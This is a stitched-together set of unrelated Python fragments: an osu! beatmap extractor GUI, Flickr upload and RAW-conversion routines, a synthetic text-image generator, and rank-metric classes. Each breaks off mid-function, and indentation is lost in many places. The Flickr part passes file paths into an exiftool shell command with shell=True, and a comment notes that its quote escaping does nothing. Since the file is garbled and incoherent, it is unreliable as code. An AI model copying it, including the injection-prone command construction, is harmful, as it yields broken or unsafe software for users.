        self.table_MapList.pack(side=LEFT, padx=5, pady=5, fill=BOTH, expand=True)
        self.table_MapList.heading("#0", text="", anchor=CENTER)
        self.table_MapList.heading("#1", text="#", anchor=CENTER)
        self.table_MapList.heading("#2", text="Name", anchor=CENTER)
        self.table_MapList.heading("#3", text="Available Extension", anchor=CENTER)
        self.table_MapList.column("#0", width=0, stretch=False)
        self.table_MapList.column("#1", width=50, stretch=False)
        self.table_MapList.column("#2", width=300, stretch=True)
        self.table_MapList.column("#3", width=200, stretch=False)
        # self.scrollbarX.config(command=self.table_MapList.xview)
        self.scrollbarY.config(command=self.table_MapList.yview)
        self.table_MapList.config(yscrollcommand=self.scrollbarY.set)
        self.table_MapList.bind("<Button-1>", self.handle_click)
        # 3
        # loadbar
        self.loadbar = ttk.Progressbar(self.frame_3_row_1, orient=HORIZONTAL, length=200, mode="determinate")
        self.loadbar.pack(side=TOP, fill=BOTH, expand=True)
        # For the label / extraction bookkeeping
        self.processed = 0
        self.total = 0
        self.cancel = False
        # Set logo (best-effort; ignore a missing/unsupported icon file)
        try:
            self.root.iconbitmap(os.path.join(os.path.dirname(os.path.realpath(__file__)), "logo.ico"))
        except Exception:
            pass
def cancelExtract(self):
self.cancel = True
def clearAll(self):
# Ask confirmation first
if len(self.table_MapList.get_children()) > 0:
if messagebox.askokcancel("Clear All", "Are you sure you want to clear all loaded beatmaps?"):
self.table_MapList.delete(*self.table_MapList.get_children())
# Update label
self.label_MapCount.config(text="Beatmaps loaded: 0")
self.label_Processed.config(text="Processed: 0/0")
def clearSelected(self):
if len(self.table_MapList.selection()) > 0:
for item in self.table_MapList.selection():
self.table_MapList.delete(item)
self.total -= 1
# Update label
self.label_MapCount.config(text="Beatmaps loaded: {}".format(len(self.table_MapList.get_children())))
self.label_Processed.config(text="Processed: {}/{}".format(self.processed, self.total))
def extractAll(self):
self.cancel = False # reset cancel
# Check if osu exist in path or not
if not os.path.exists(self.entry_OsuPath.get()) or "osu!.exe" not in os.listdir(self.entry_OsuPath.get()):
messagebox.showwarning("Warning", "Couldn't find osu!.exe in path provided.", parent=self.root)
# show warning and ask confirmation to procceed or not
if not messagebox.askokcancel("Warning", "Seems like your Osu! path is incorrect, we couldn't find osu!.exe in the path.\nDo you still want to continue?", parent=self.root):
return
# | |
# -------------------------------------------------------------------------
# convert_raw_file
#
# Converts a RAW file into JPG. Also copies tags from RAW file.
# Uses external exiftool.
#
def convert_raw_file(self, a_dirpath, a_fname, a_fext, a_fbasename):
""" convert_raw_file
a_dirpath = dirpath folder for filename
a_fname = filename (including extension)
a_fext = lower case extension of current file
a_fbasename = filiename without extension
"""
# ---------------------------------------------------------------------
# convert_raw_file_cmd
#
# Prepare and executes the command for RAW file conversion.
#
def convert_raw_file_cmd(convert_or_copy_tags):
""" convert_raw_file_cmd
convert_or_copy_tags = 'Convert' converts a raw file to JPG
'CopyTags' copy tags from raw file to JPG
"""
assert convert_or_copy_tags in ['Convert', 'CopyTags'],\
NP.niceassert('convert_raw_file_cmd: wrong argument:[{!s}]'
.format(convert_or_copy_tags))
result_cmd = True
if convert_or_copy_tags == 'Convert':
flag = "-PreviewImage" \
if a_fext == 'cr2' else "-JpgFromRaw"
command = os.path.join(
NP.strunicodeout(self.xcfg.RAW_TOOL_PATH), 'exiftool') +\
" -b " + flag + " -w .JPG -ext " + a_fext + " -r " +\
"'" + os.path.join(NP.strunicodeout(a_dirpath),
NP.strunicodeout(a_fname)) + "'"
elif convert_or_copy_tags == 'CopyTags':
command = os.path.join(
NP.strunicodeout(self.xcfg.RAW_TOOL_PATH), 'exiftool') +\
" -overwrite_original_in_place -tagsfromfile " +\
"'" + os.path.join(NP.strunicodeout(a_dirpath),
NP.strunicodeout(a_fname)) + "'" +\
" -r -all:all -ext JPG " +\
"'" + os.path.join(NP.strunicodeout(a_dirpath),
NP.strunicodeout(a_fbasename)) + ".JPG'"
else:
# Nothing to do
return False
logging.info(command)
try:
p_cmd = subprocess.call(command, shell=True)
except Exception:
NP.niceerror(caught=True,
caughtprefix='+++',
caughtcode='030',
caughtmsg='Error calling exiftool:[{!s}]'
.format(convert_or_copy_tags),
useniceprint=True,
exceptsysinfo=True)
result_cmd = False
finally:
if p_cmd is None:
del p_cmd
return result_cmd
# ---------------------------------------------------------------------
if self.args.dry_run:
return True
NP.niceprint(' Converting raw:[{!s}]'
.format(NP.strunicodeout(os.path.join(a_dirpath,
a_fname))),
logalso=logging.INFO)
success = False
# file_ext = a_fname's extension (without the ".")
file_ext = os.path.splitext(a_fname)[-1][1:].lower()
assert NP.strunicodeout(a_fext) == NP.strunicodeout(file_ext),\
NP.niceassert('File extensions differ:[{!s}]!=[{!s}]'
.format(NP.strunicodeout(a_fext),
NP.strunicodeout(file_ext)))
if not os.path.exists(os.path.join(a_dirpath, a_fbasename) + ".JPG"):
logging.info('.....Create JPG:[%s] jpg:[%s] ext:[%s]',
NP.strunicodeout(a_fname),
NP.strunicodeout(a_fbasename),
NP.strunicodeout(file_ext))
if convert_raw_file_cmd('Convert'):
NP.niceprint('....Created JPG:[{!s}]'
.format(NP.strunicodeout(a_fbasename) + ".JPG"))
else:
NP.niceprint('.....raw failed:[{!s}]'.format(a_fname))
return success
else:
NP.niceprint('raw: JPG exists:[{!s}]'
.format(NP.strunicodeout(a_fbasename) + ".JPG"),
logalso=logging.WARNING)
return success
if os.path.exists(NP.strunicodeout(
os.path.join(a_dirpath, a_fbasename)) + ".JPG"):
NP.niceprint('...Copying tags:[{!s}]'
.format(NP.strunicodeout(a_fname)))
if convert_raw_file_cmd('CopyTags'):
NP.niceprint('....Copied tags:[{!s}]'
.format(NP.strunicodeout(a_fname)))
else:
NP.niceprint('raw tags failed:[{!s}]'.format(a_fname))
return success
else:
NP.niceprint('.....raw failed:[{!s}]'.format(a_fname),
logalso=logging.WARNING)
return success
success = True
NP.niceprint(' Converted raw:[{!s}]'
.format(NP.strunicodeout(a_fname)),
logalso=logging.INFO)
return success
# -------------------------------------------------------------------------
# grab_newfiles
#
# Select files and RAW files from FILES_DIR to be uploaded
#
    def grab_newfiles(self):
        """ grab_newfiles
        Select files from FILES_DIR taking into consideration
        EXCLUDED_FOLDERS and IGNORED_REGEX filenames.
        Returns two sorted file lists:
            JPG files found
            RAW files found (if RAW conversion option is enabled)
        """
        files = []
        rawfiles = []
        for dirpath, dirnames, filenames in\
                os.walk(self.xcfg.FILES_DIR, followlinks=True):
            # Prevent walking thru files in the list of EXCLUDED_FOLDERS
            # Reduce time by not checking a file in an excluded folder
            logging.debug('Check for UnicodeWarning comparison '
                          'dirpath:[%s] type:[%s]',
                          NP.strunicodeout(os.path.basename(
                              os.path.normpath(dirpath))),
                          type(os.path.basename(
                              os.path.normpath(dirpath))))
            if os.path.basename(os.path.normpath(dirpath)) \
                    in self.xcfg.EXCLUDED_FOLDERS:
                # Emptying dirnames/filenames in place prunes os.walk.
                dirnames[:] = []
                filenames[:] = []
                logging.info('Folder [%s] on path [%s] excluded.',
                             NP.strunicodeout(os.path.basename(
                                 os.path.normpath(dirpath))),
                             NP.strunicodeout(os.path.normpath(dirpath)))
            for afile in filenames:
                file_path = os.path.join(NP.strunicodeout(dirpath),
                                         NP.strunicodeout(afile))
                # Ignore filenames within IGNORED_REGEX
                if any(ignored.search(afile)
                       for ignored in self.xcfg.IGNORED_REGEX):
                    logging.debug('File:[%s] in IGNORED_REGEX:',
                                  NP.strunicodeout(file_path))
                    continue
                ext = os.path.splitext(os.path.basename(afile))[1][1:].lower()
                if ext in self.xcfg.ALLOWED_EXT:
                    filesize = os.path.getsize(os.path.join(
                        NP.strunicodeout(dirpath), NP.strunicodeout(afile)))
                    if filesize < self.xcfg.FILE_MAX_SIZE:
                        # NOTE(review): "\'" equals "'", so this replace()
                        # is a no-op; "\\'" (quote escaping) was presumably
                        # intended — confirm before changing, since fixing
                        # it would alter the stored paths.
                        files.append(
                            os.path.normpath(
                                NP.strunicodeout(dirpath) +
                                NP.strunicodeout("/") +
                                NP.strunicodeout(afile).replace("'", "\'")))
                    else:
                        NP.niceprint('Skipping file due to '
                                     'size restriction: [{!s}]'.format(
                                         os.path.normpath(
                                             NP.strunicodeout(dirpath) +
                                             NP.strunicodeout('/') +
                                             NP.strunicodeout(afile))))
                # Assumes xCFG.ALLOWED_EXT and xCFG.RAW_EXT are disjoint
                elif (self.xcfg.CONVERT_RAW_FILES and
                      (ext in self.xcfg.RAW_EXT)):
                    # Only include RAW files that have no sibling JPG yet.
                    if not os.path.exists(
                            os.path.join(
                                NP.strunicodeout(dirpath),
                                NP.strunicodeout(os.path.splitext(afile)[0])) +
                            ".JPG"):
                        logging.debug('rawfiles: including:[%s]',
                                      NP.strunicodeout(afile))
                        rawfiles.append(
                            os.path.normpath(
                                NP.strunicodeout(dirpath) +
                                NP.strunicodeout("/") +
                                NP.strunicodeout(afile).replace("'", "\'")))
                    else:
                        logging.warning('rawfiles: JPG exists. '
                                        'Not including:[%s]',
                                        NP.strunicodeout(afile))
        rawfiles.sort()
        files.sort()
        if not self.args.mask_sensitive:
            NP.niceprint('Pretty Print Output for [files]-------\n{!s}'
                         .format(pprint.pformat(files)),
                         verbosity=3,
                         logalso=logging.DEBUG)
            NP.niceprint('Pretty Print Output for [rawfiles]-------\n{!s}'
                         .format(pprint.pformat(rawfiles)),
                         verbosity=3,
                         logalso=logging.DEBUG)
        else:
            NP.niceprint('Masking enabled: Pretty Print Output for '
                         '[files]/[rawfiles] disabled!',
                         verbosity=3,
                         logalso=logging.DEBUG)
        return files, rawfiles
# -------------------------------------------------------------------------
# is_file_excluded
#
# Check if a filename is within the list of EXCLUDED_FOLDERS. Returns:
# True = if filename's folder is within one of the EXCLUDED_FOLDERS
# False = if filename's folder not on one of the EXCLUDED_FOLDERS
#
def is_file_excluded(self, filename):
""" is_file_excluded
Returns True if a file is within an EXCLUDED_FOLDERS directory/folder
"""
for excluded_dir in self.xcfg.EXCLUDED_FOLDERS:
logging.debug('type(excluded_dir):[%s]', type(excluded_dir))
logging.debug('is excluded_dir unicode?[%s]',
NP.is_str_unicode(excluded_dir))
logging.debug('type(filename):[%s]', type(filename))
logging.debug('is filename unicode?[{%s]',
NP.is_str_unicode(filename))
logging.debug('is os.path.dirname(filename) unicode?[%s]',
NP.is_str_unicode(os.path.dirname(filename)))
logging.debug('excluded_dir:[%s] filename:[%s]',
NP.strunicodeout(excluded_dir),
NP.strunicodeout(filename))
# Now everything should be in Unicode
if excluded_dir in os.path.dirname(filename):
logging.debug('Returning is_file_excluded:[True]')
return True
logging.debug('Returning is_file_excluded:[False]')
return False
# -------------------------------------------------------------------------
# update_video_date
#
# Update the video date taken based on last_modified time of file
#
def update_video_date(self, xfile_id, xfile, xlast_modified):
""" update_video_date
Update the video date taken based on last_modified time of file
"""
# Update Date/Time on Flickr for Video files
# Flickr doesn't read it from the video file itself.
filetype = mimetypes.guess_type(xfile)
logging.info('filetype is:[%s]',
'None'
if filetype is None
else filetype[0])
# update video date/time TAKEN.
# Flickr doesn't read it from the video file itself.
if (not filetype[0] is None) and ('video' in filetype[0]):
res_set_date = None
video_date = NUTIME.strftime('%Y-%m-%d %H:%M:%S',
NUTIME.localtime(xlast_modified))
NP.niceprint(' Setting Date:[{!s}] for file:[{!s}] Id=[{!s}]'
.format(video_date,
NP.strunicodeout(xfile),
xfile_id),
verbosity=1,
logalso=logging.INFO)
res_set_date = self.photos_set_dates(xfile_id,
str(video_date))
if faw.is_good(res_set_date):
NP.niceprint('Successful date:[{!s}] '
'for file:[{!s}]'
.format(NP.strunicodeout(video_date),
NP.strunicodeout(xfile)))
return True
# -------------------------------------------------------------------------
# mp_upload_file
#
# upload_file wrapper for multiprocessing purposes
#
def mp_upload_file(self, lock, running, mutex, filelist, ctotal, cur):
""" mp_upload_file
Wrapper function for multiprocessing support to call upload_file
with a chunk of the files.
lock = for database access control in multiprocessing
running = shared value to count processed files in multiprocessing
mutex = for running access control in multiprocessing
"""
# CODING pylint
# pylint: disable=unused-argument
for i, filepic in enumerate(filelist):
logging.warning('===Element of Chunk:[%s] file:[%s]', i, filepic)
self.upload_file(lock, filepic)
# no need to check for
# (self.args.processes and self.args.processes > 0):
# as mp_upload_file is already multiprocessing
logging.debug('===Multiprocessing=== in.mutex.acquire(w)')
mutex.acquire()
running.value += 1
xcount = running.value
mutex.release()
logging.warning('===Multiprocessing=== out.mutex.release(w)')
# Show number of files processed so far
NP.niceprocessedfiles(xcount, ctotal, False)
# -------------------------------------------------------------------------
# upload_file
#
# uploads a file into flickr
# lock = parameter for multiprocessing control of access to DB.
# (if self.args.processes = 0 then lock can be None
# as it is not used)
# file = file to be uploaded
#
def upload_file(self, lock, file):
""" upload_file
uploads file into flickr
May run in single or multiprocessing mode
lock = parameter for multiprocessing control of access to DB.
(if self.args.processes = 0 then lock may be None
as it is not used)
file = file to be uploaded
"""
# ---------------------------------------------------------------------
# db_insert_files
#
def db_insert_files(lock,
file_id, file, file_checksum, last_modified):
""" db_insert_files
Insert into local DB files table.
lock = for multiprocessing access control to DB
file_id = pic id
file = filename
file_checksum = md5 checksum
last_modified = Last modified time
"""
# Database Locked is returned often on this INSERT
# Will try MAX_SQL_ATTEMPTS...
attempts = None
for attempts in range(0, self.xcfg.MAX_SQL_ATTEMPTS):
logging.info('db_insert_files: Start:[%s/%s attempts].',
attempts,
self.xcfg.MAX_SQL_ATTEMPTS)
db_success = litedb.execute(
con, 'INSERT#030', lock, self.args.processes,
cur,
'INSERT INTO files '
'(files_id, path, md5, last_modified, tagged) '
'VALUES (?, ?, ?, ?, 1)',
qmarkargs=(file_id, file, file_checksum, last_modified),
dbcaughtcode='031')
if not db_success:
NP.niceerror(caught=True,
caughtprefix='+++ DB',
caughtcode='032',
caughtmsg='Sleep 2 and retry SQL...'
'[{!s}/{!s} attempts]'
.format(attempts, self.xcfg.MAX_SQL_ATTEMPTS),
useniceprint=True)
NUTIME.sleep(2)
elif attempts > 0:
NP.niceerror(caught=True,
caughtprefix='+++ DB',
caughtcode='033',
caughtmsg='Succeed at retry SQL...'
'[{!s}/{!s} attempts]'
.format(attempts,
self.xcfg.MAX_SQL_ATTEMPTS),
useniceprint=True)
logging.info('db_insert_files: Done:[%s/%s attempts].',
attempts,
self.xcfg.MAX_SQL_ATTEMPTS)
# Break the cycle of SQL_ATTEMPTS and continue
break
# ---------------------------------------------------------------------
# ---------------------------------------------------------------------
# db_insert_badfiles
#
def db_insert_badfiles(lock,
file, file_checksum, last_modified):
""" db_insert_badfiles
Insert into local DB Bad files table.
lock = for multiprocessing access control to DB
file = filename
file_checksum = md5 checksum
last_modified = Last modified time
"""
litedb.execute(con, 'INSERT#035', lock, self.args.processes,
cur,
'INSERT INTO badfiles '
'(path, md5, last_modified, tagged) '
'VALUES (?, ?, ?, 1)',
qmarkargs=(file, file_checksum, last_modified),
dbcaughtcode='035')
# ---------------------------------------------------------------------
if self.args.dry_run:
NP.niceprint(' Dry Run file:[{!s}]...'
.format(NP.strunicodeout(file)))
return True
NP.niceprint(' Checking file:[{!s}]...'
.format(NP.strunicodeout(file)),
verbosity=1)
setname = faw.set_name_from_file(file,
self.xcfg.FILES_DIR,
self.xcfg.FULL_SET_NAME)
success = False
con, cur = litedb.connect(self.xcfg.DB_PATH)
litedb.execute(con, 'SELECT#036', lock, self.args.processes,
cur,
'SELECT rowid, files_id, path, set_id, md5, '
'tagged, last_modified | |
import argparse
import os, errno
import random as rnd
import string
import sys
import csv
import cv2
from tqdm import tqdm
from string_generator import (
create_strings_from_dict,
create_strings_from_file,
create_strings_from_wikipedia,
create_strings_randomly
)
from data_generator import FakeTextDataGenerator
from multiprocessing import Pool
def margins(margin):
    """Parse a comma-separated margin string into a list of four ints.

    A single value (e.g. "5") is applied to all four sides; otherwise the
    values are taken in the order given (e.g. "5,10,5,10").
    """
    values = margin.split(',')
    if len(values) == 1:
        # Bug fix: this branch previously returned a list of *strings*,
        # unlike the multi-value branch, which returns ints.
        return [int(values[0])] * 4
    return [int(m) for m in values]
def parse_arguments():
    """
    Parse the command line arguments of the program.

    Returns the parsed argparse.Namespace; every option below has a default,
    so the script can run with no arguments at all.
    """
    parser = argparse.ArgumentParser(description='Generate synthetic text data for text recognition.')
    # --- input / output and text source ---
    parser.add_argument(
        "--output_dir",
        type=str,
        nargs="?",
        help="The output directory",
        default="out/",
    )
    parser.add_argument(
        "-i",
        "--input_file",
        type=str,
        nargs="?",
        help="When set, this argument uses a specified text file as source for the text",
        default=""
    )
    parser.add_argument(
        "-l",
        "--language",
        type=str,
        nargs="?",
        help="The language to use, should be fr (French), en (English), es (Spanish), de (German), or cn (Chinese).",
        default="en"
    )
    parser.add_argument(
        "-c",
        "--count",
        type=int,
        nargs="?",
        help="The number of images to be created.",
        default=1000
    )
    # --- random-sequence source options (only used together with -rs) ---
    parser.add_argument(
        "-rs",
        "--random_sequences",
        action="store_true",
        help="Use random sequences as the source text for the generation. Set '-let','-num','-sym' to use letters/numbers/symbols. If none specified, using all three.",
        default=False
    )
    parser.add_argument(
        "-let",
        "--include_letters",
        action="store_true",
        help="Define if random sequences should contain letters. Only works with -rs",
        default=False
    )
    parser.add_argument(
        "-num",
        "--include_numbers",
        action="store_true",
        help="Define if random sequences should contain numbers. Only works with -rs",
        default=False
    )
    parser.add_argument(
        "-sym",
        "--include_symbols",
        action="store_true",
        help="Define if random sequences should contain symbols. Only works with -rs",
        default=False
    )
    parser.add_argument(
        "-w",
        "--length",
        type=int,
        nargs="?",
        help="Define how many words should be included in each generated sample. If the text source is Wikipedia, this is the MINIMUM length",
        default=1
    )
    parser.add_argument(
        "-r",
        "--random",
        action="store_true",
        help="Define if the produced string will have variable word count (with --length being the maximum)",
        default=False
    )
    # --- image geometry and generation performance ---
    parser.add_argument(
        "-f",
        "--format",
        type=int,
        nargs="?",
        help="Define the height of the produced images if horizontal, else the width",
        default=32,
    )
    parser.add_argument(
        "-t",
        "--thread_count",
        type=int,
        nargs="?",
        help="Define the number of thread to use for image generation",
        default=1,
    )
    parser.add_argument(
        "-e",
        "--extension",
        type=str,
        nargs="?",
        help="Define the extension to save the image with",
        default="jpg",
    )
    # --- visual distortions and degradations ---
    parser.add_argument(
        "-k",
        "--skew_angle",
        type=int,
        nargs="?",
        help="Define skewing angle of the generated text. In positive degrees",
        default=0,
    )
    parser.add_argument(
        "-rk",
        "--random_skew",
        action="store_true",
        help="When set, the skew angle will be randomized between the value set with -k and it's opposite",
        default=False,
    )
    parser.add_argument(
        "-wk",
        "--use_wikipedia",
        action="store_true",
        help="Use Wikipedia as the source text for the generation, using this parameter ignores -r, -n, -s",
        default=False,
    )
    parser.add_argument(
        "-bl",
        "--blur",
        type=float,
        nargs="?",
        help="Apply gaussian blur to the resulting sample. Should be an integer defining the blur radius",
        default=0,
    )
    parser.add_argument(
        "-rbl",
        "--random_blur",
        action="store_true",
        help="When set, the blur radius will be randomized between 0 and -bl.",
        default=False,
    )
    parser.add_argument(
        "-b",
        "--background",
        type=int,
        nargs="?",
        help="Define what kind of background to use. 0: Gaussian Noise, 1: Plain white, 2: Quasicrystal, 3: Pictures",
        default=0,
    )
    parser.add_argument(
        "-hw",
        "--handwritten",
        action="store_true",
        help="Define if the data will be \"handwritten\" by an RNN",
    )
    parser.add_argument(
        "-na",
        "--name_format",
        type=int,
        help="Define how the produced files will be named. 0: [TEXT]_[ID].[EXT], 1: [ID]_[TEXT].[EXT] 2: [ID].[EXT] + one file labels.txt containing id-to-label mappings",
        default=0,
    )
    parser.add_argument(
        "-d",
        "--distorsion",
        type=int,
        nargs="?",
        help="Define a distorsion applied to the resulting image. 0: None (Default), 1: Sine wave, 2: Cosine wave, 3: Random",
        default=0
    )
    parser.add_argument(
        "-do",
        "--distorsion_orientation",
        type=int,
        nargs="?",
        help="Define the distorsion's orientation. Only used if -d is specified. 0: Vertical (Up and down), 1: Horizontal (Left and Right), 2: Both",
        default=0
    )
    # --- layout: size, alignment, orientation, colors, spacing ---
    parser.add_argument(
        "-wd",
        "--width",
        type=int,
        nargs="?",
        help="Define the width of the resulting image. If not set it will be the width of the text + 10. If the width of the generated text is bigger that number will be used",
        default=-1
    )
    parser.add_argument(
        "-al",
        "--alignment",
        type=int,
        nargs="?",
        help="Define the alignment of the text in the image. Only used if the width parameter is set. 0: left, 1: center, 2: right",
        default=1
    )
    parser.add_argument(
        "-or",
        "--orientation",
        type=int,
        nargs="?",
        help="Define the orientation of the text. 0: Horizontal, 1: Vertical",
        default=0
    )
    parser.add_argument(
        "-tc",
        "--text_color",
        type=str,
        nargs="?",
        help="Define the text's color, should be either a single hex color or a range in the ?,? format.",
        default='#282828'
    )
    parser.add_argument(
        "-sw",
        "--space_width",
        type=float,
        nargs="?",
        help="Define the width of the spaces between words. 2.0 means twice the normal space width",
        default=1.0
    )
    # NOTE: `type=margins` parses "t,l,b,r" strings; the default below is
    # already a tuple of ints and bypasses that conversion.
    parser.add_argument(
        "-m",
        "--margins",
        type=margins,
        nargs="?",
        help="Define the margins around the text when rendered. In pixels",
        default=(5, 5, 5, 5)
    )
    parser.add_argument(
        "-fi",
        "--fit",
        action="store_true",
        help="Apply a tight crop around the rendered text",
        default=False
    )
    parser.add_argument(
        "-ft",
        "--font",
        type=str,
        nargs="?",
        help="Define font to be used"
    )
    parser.add_argument(
        "-ca",
        "--case",
        type=str,
        nargs="?",
        help="Generate upper or lowercase only. arguments: upper or lower. Example: --case upper"
    )
    return parser.parse_args()
def load_dict(lang):
    """
    Read the dictionary file for the given language and return its
    non-empty lines as a list of words.
    """
    dict_path = os.path.join('dicts', lang + '.txt')
    with open(dict_path, 'r', encoding="utf8", errors='ignore') as dict_file:
        return [word for word in dict_file.read().splitlines() if len(word) > 0]
def extract_from_dic(lang_dict, word_vec):
    """Build a sentence from dictionary words matching the requested lengths.

    For every length in word_vec, appends (with no separator) the first word
    of that exact length found in a shuffled copy of lang_dict. The result
    starts with a single space; lengths with no matching word are skipped.
    """
    shuffled_dic = lang_dict[:]
    rnd.shuffle(shuffled_dic)
    sentence = ' '
    for target_len in word_vec:
        for word in shuffled_dic:
            # Bug fix: compare with '==' instead of 'is'; identity
            # comparison only happens to work for small interned ints and
            # silently fails for lengths outside CPython's cache range.
            if len(word) == target_len:
                sentence += word
                break
    return sentence
def load_fonts(lang):
    """
    List the font file paths for the given language: the Chinese fonts
    directory for 'cn', the latin fonts directory otherwise.
    """
    font_dir = 'fonts/cn' if lang == 'cn' else 'fonts/latin'
    return [os.path.join(font_dir, font) for font in os.listdir(font_dir)]
def alpha_sort(file):
    """
    Rewrites a csv file with its data rows sorted case-insensitively on the
    first (GT) column; the header row is preserved in place.
    """
    # newline='' is required by the csv module; without it the writer emits
    # doubled line endings on Windows.
    with open(file, encoding="utf8", errors='ignore', newline='') as csv_in:
        reader = csv.reader(csv_in)
        headers = next(reader, None)
        sorted_rows = sorted(reader, key=lambda row: row[0].lower(), reverse=False)
    with open(file, 'w', encoding="utf8", errors='ignore', newline='') as csv_out:
        writer = csv.writer(csv_out)
        writer.writerow(headers)
        writer.writerows(sorted_rows)
    return
def sentence2wordlen(sentences):
    """
    1. For each sentence, records the length of every remaining word.
    2. Splits the target (last word) off each sentence and returns the
       modified, target-less sentences.

    Also writes 'Wordcount_record.csv' with one row per sentence:
    [sentence-without-target, target, len(sentence), word length, ...].
    """
    wordlen, targets = [], []
    sentences_no_target = []  # sentences with no target
    for sentence in sentences:
        word_vec = sentence.split()  # split to words
        targets.append(word_vec.pop())  # set last word as target
        sentence = ' '.join(word_vec)  # reassemble the sentence w/o target
        wordlen.append([len(word) for word in word_vec])
        sentences_no_target.append(sentence)
    fileout = 'Wordcount_record.csv'
    # newline='' keeps the csv module from doubling line endings on Windows.
    with open(fileout, 'w', encoding="utf-8_sig", newline='') as csv_file:
        writer = csv.writer(csv_file)
        # Bug fix: iterate with enumerate instead of wordlen.index(), which
        # returned the *first* matching row whenever two sentences shared
        # the same word-length vector, mis-pairing sentences and targets.
        for idx, lengths in enumerate(wordlen):
            sentence = sentences_no_target[idx]
            lengths.insert(0, sentence)
            lengths.insert(1, targets[idx])
            lengths.insert(2, len(sentence))
            writer.writerow(lengths)
    return sentences_no_target
def randomize_sentence(file):
    """
    For every row of the csv record file, generates a random sentence whose
    word lengths match the recorded ones and collects the target strings.
    Returns (random_sentences, target_strings).
    """
    with open(file, 'r', encoding="utf-8_sig") as csv_file:
        rows = list(csv.reader(csv_file))
    random_sentences = []
    target_strings = []
    alphabet = string.ascii_uppercase + string.ascii_lowercase + string.digits
    for row in rows:
        target_strings.append(row[1])  # take last word for now => rnd.randint
        print(row[0], ' ', len(row[0]), ' target lc', row[1][-1])
        # Columns 3.. hold the word lengths; draw a random word per column.
        words = [''.join(rnd.choices(alphabet, k=int(row[i])))
                 for i in range(3, len(row))]
        sentence = ' '.join(words)
        random_sentences.append(sentence)
        print(sentence, ' ', len(sentence), os.linesep)
    return random_sentences, target_strings
def generate_random_get_targets(sentences):
"""
1. Takes in the sentence and outputs a vector with the length of every word in it.
2. Splits target and from sentence and returns both; mod version and target array.
"""
lang_dic = []
with open(os.path.join('dicts', 'google_en.txt'), 'r', encoding="utf8", errors='ignore') as d:
lang_dic = [l for l in d.read().splitlines() if len(l) > 0]
# shuffle_dict = lang_dict[:]
wordlen, targets = [], []
sentencesNT = [] # sentences with no target
for sentence in sentences:
word_vec = sentence.split() # split to words
targets.append(' ' + word_vec.pop()) # set last word as target
word_len1sen = []
sentence = ' '.join(word_vec) # reassemble the word w/o target
for word in word_vec:
word_len1sen.append(len(word))
wordlen.append(word_len1sen)
sentencesNT.append(sentence)
random_sentences = [] # random sentences
for sentence in sentencesNT:
index = sentencesNT.index(sentence)
word_len1sen = wordlen[index]
rnd_sentence = ''
for _ in word_len1sen: # shuffle_dict:
# rnd.shuffle(shuffle_dict)
rnd_word = rnd.choice(lang_dic)
while len(rnd_word) != _:
rnd_word = rnd.choice(lang_dic)
rnd_sentence += rnd_word + ' '
# wl = int(_) # consider this part if using random strings instead of words
# res = ''.join(rnd.choices(string.ascii_uppercase + string.ascii_lowercase + string.digits, k=wl))
| |
from precomputed cumulative sums and aggregate
x = x[num_candidates - 1] - np.log(num_candidates)
return np.exp(x.sum())
@parse_docdata
class InverseGeometricMeanRank(RankBasedMetric):
    """The inverse geometric mean rank.

    ---
    link: https://arxiv.org/abs/2203.07544
    description: The inverse of the geometric mean over all ranks.
    """

    # NOTE: the trailing "---" section of the docstring is parsed by
    # @parse_docdata at import time; treat it as data, not prose.
    name = "Inverse Geometric Mean Rank (IGMR)"
    value_range = ValueRange(lower=0, lower_inclusive=False, upper=1, upper_inclusive=True)
    increasing = True
    synonyms: ClassVar[Collection[str]] = ("igmr",)

    def __call__(self, ranks: np.ndarray, num_candidates: Optional[np.ndarray] = None) -> float:  # noqa: D102
        # 1 / geometric-mean(ranks); num_candidates is ignored here.
        return np.reciprocal(stats.gmean(ranks)).item()
@parse_docdata
class HarmonicMeanRank(RankBasedMetric):
    """The harmonic mean rank.

    ---
    link: https://arxiv.org/abs/2203.07544
    description: The harmonic mean over all ranks.
    """

    # Lower is better (increasing = False); range is [1, inf).
    name = "Harmonic Mean Rank (HMR)"
    value_range = ValueRange(lower=1, lower_inclusive=True, upper=math.inf)
    increasing = False
    synonyms: ClassVar[Collection[str]] = ("hmr",)

    def __call__(self, ranks: np.ndarray, num_candidates: Optional[np.ndarray] = None) -> float:  # noqa: D102
        # Harmonic mean of the ranks; num_candidates is ignored here.
        return stats.hmean(ranks).item()
def generalized_harmonic_numbers(n: int, p: int = -1) -> np.ndarray:
    r"""
    Compute the generalized harmonic numbers $H_p(k)$ for $k = 1, \dots, n$.

    .. math::

        H_p(n) = \sum \limits_{i=1}^{n} i^{-p}

    :param n:
        the maximum number for which the generalized harmonic numbers are calculated
    :param p:
        the power, typically negative

    :return: shape: (n,)
        the first $n$ generalized harmonic numbers

    .. seealso::
        https://en.wikipedia.org/wiki/Harmonic_number#Generalizations
    """
    powers = np.arange(1, n + 1, dtype=float) ** p
    return powers.cumsum()
def harmonic_variances(n: int) -> np.ndarray:
    r"""
    Pre-calculate variances of inverse rank distributions.

    With

    .. math::

        H_p(n) = \sum \limits_{i=1}^{n} i^{-p}

    denoting the generalized harmonic numbers, and abbreviating $H(n) := H_1(n)$, we have

    .. math::

        \textit{V}[n]
            &= \frac{1}{n} \sum \limits_{i=1}^n \left( i^{-1} - \frac{H(n)}{n} \right)^2 \\
            &= \frac{n \cdot H_2(n) - H(n)^2}{n^2}

    :param n:
        the maximum rank number

    :return: shape: (n,)
        the variances for the discrete uniform distribution over
        $\{\frac{1}{1}, \dots, \frac{1}{k}\}$, for $k = 1, \dots, n$

    .. note::
        Doc fix: the return shape is (n,), not (n+1,) as previously stated;
        callers prepend a leading 0 themselves (``np.r_[0, ...]``).
    """
    h = generalized_harmonic_numbers(n)
    h2 = generalized_harmonic_numbers(n, p=-2)
    # k = 1 .. n for the per-k normalization below.
    k = np.arange(1, n + 1)
    # Var[1/R] for R ~ Uniform{1..k}, via E[X^2] - E[X]^2 in terms of H, H_2.
    return (k * h2 - h**2) / k**2
@parse_docdata
class InverseHarmonicMeanRank(RankBasedMetric):
    r"""The inverse harmonic mean rank.

    Let

    .. math::

        H_m(n) = \sum \limits_{i=1}^{n} i^{-m}

    denote the generalized harmonic number, with $H(n) := H_{1}(n)$ for brevity.
    Thus, we have

    .. math::

        \mathbb{E}\left[r_i^{-1}\right] = \frac{H(N_i)}{N_i}

    and hence

    .. math::

        \mathbb{E}\left[\textrm{MRR}\right]
            &= \mathbb{E}\left[\frac{1}{n} \sum \limits_{i=1}^n r_i^{-1}\right] \\
